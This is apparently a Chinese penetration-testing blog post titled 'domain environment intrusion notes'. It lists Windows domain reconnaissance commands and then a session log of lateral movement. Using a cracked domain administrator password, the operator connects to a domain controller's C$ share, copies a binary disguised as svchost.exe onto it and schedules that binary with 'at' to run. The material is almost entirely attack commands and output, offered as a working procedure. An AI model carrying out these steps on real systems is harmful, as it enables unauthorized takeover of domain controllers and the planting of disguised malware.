域环境入侵笔记

最新推荐文章于 2024-07-22 07:47:44 发布

原创最新推荐文章于 2024-07-22 07:47:44 发布 · 1k 阅读

0 ·

CC 4.0 BY-SA版权

渗透相关专栏收录该内容

43 篇文章

订阅专栏

本文介绍了通过命令行工具进行域控制器管理的方法，包括查看域用户、域控机器信息及域内的成员机器等操作。此外，还展示了如何利用已知的域控管理员密码远程连接并操控域控服务器，进行文件上传、定时任务设置等一系列高级操作。

net user /domain //查看域用户

net config server

net config workstation

nltest/dsgetdc:mydomain //查看域控机器的IP

net group "domain computers" /domain //查看域里的成员机器

---------------------------------------------------------------------------------------------------------------------

//已经破解出了域控管理员的密码

C:\>net use \\192.168.1.153 "123456" /user:mydomain\Administrator
The command completed successfully.

C:\>dir \\192.168.1.153\C$
Volume in drive \\192.168.1.153\C$ has no label.
Volume Serial Number is C6BC-1F87

Directory of \\192.168.1.153\C$

C:\>copy C:\programdata\svchost.exe \\192.168.1.153\C$\Intel\svchost.exe
1 file(s) copied.

C:\>at \\192.168.1.153
There are no entries in the list.

C:\>net time \\192.168.1.153
Current time at \\192.168.1.153 is 7/20/2013 4:02:25 PM

The command completed successfully.

C:\>at \\192.168.1.153 16:04 C:\Intel\svchost.exe
Added a new job with job ID = 1

C:\>at \\192.168.1.153
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 4:04 PM C:\Intel\svchost.exe

C:\>net use \\192.168.1.153 /del
\\192.168.1.153 was deleted successfully.
---------------------------------------------------------------------------------

OKOK！